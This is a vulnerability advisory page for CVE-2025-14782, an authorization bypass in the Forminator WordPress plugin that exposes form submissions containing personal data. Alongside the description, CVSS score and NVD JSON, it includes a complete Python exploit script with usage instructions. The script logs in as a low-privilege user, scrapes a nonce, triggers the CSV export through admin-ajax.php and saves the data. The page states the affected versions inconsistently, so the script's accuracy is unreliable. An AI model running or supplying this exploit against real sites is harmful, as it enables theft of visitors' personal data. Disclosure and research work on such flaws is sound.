Security Vulnerability Report
中文
CVE-2025-14782 CVSS 5.3 MEDIUM

CVE-2025-14782

Published: 2026-01-09 07:16:02
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Forminator Forms plugin < 1.49.1 (所有版本至1.49.1均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14782 PoC - Forminator CSV Export Authorization Bypass # Target: WordPress site with Forminator plugin <= 1.49.1 def exploit_cve_2025_14782(target_url, username, password, form_id=1): """ Exploit authorization bypass in Forminator's listen_for_csv_export function. This PoC demonstrates how low-privilege users can export sensitive form data. """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Get admin nonce from Forminator page admin_url = f"{target_url}/wp-admin/admin.php?page=forminator-cform-wp-admin" response = session.get(admin_url) # Extract nonce from page source import re nonce_match = re.search(r'forminatorNonce\s*=\s*"([a-f0-9]+)"', response.text) if not nonce_match: nonce_match = re.search(r'nonce\s*[:=]\s*"([a-f0-9]+)"', response.text) nonce = nonce_match.group(1) if nonce_match else None # Step 3: Exploit authorization bypass to export CSV ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'forminator_export_csv', 'form_id': form_id, 'nonce': nonce or 'dummy_nonce', # Nonce may not be properly validated 'type': 'form', 'dates': 'all' } print(f"[*] Exploiting CSV export bypass for form_id={form_id}...") response = session.post(ajax_url, data=exploit_data) if response.status_code == 200 and 'text/csv' in response.headers.get('content-type', ''): print("[+] SUCCESS! Sensitive form data exported!") filename = f"forminator_export_form_{form_id}.csv" with open(filename, 'wb') as f: f.write(response.content) print(f"[+] Data saved to {filename}") return True else: print(f"[-] Export failed. Status: {response.status_code}") print(f"[-] Response: {response.text[:200]}") return False if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> [form_id]") sys.exit(1) target = sys.argv[1].rstrip('/') user = sys.argv[2] pwd = sys.argv[3] fid = sys.argv[4] if len(sys.argv) > 4 else '1' exploit_cve_2025_14782(target, user, pwd, int(fid))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14782", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:01.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information."}, {"lang": "es", "value": "El plugin Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder para WordPress es vulnerable a una omisión de autorización en todas las versiones hasta la 1.49.1, inclusive, a través de la función 'listen_for_csv_export'. Esto se debe a que el plugin no verifica correctamente que un usuario está autorizado para realizar una acción. Esto hace posible que atacantes autenticados, con acceso al panel de control de Forminator, exporten datos sensibles de envío de formularios, incluyendo información de identificación personal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3423003/forminator/trunk/library/class-export.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b28ddeb-44f5-4d19-b866-94fc2088ee6d?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.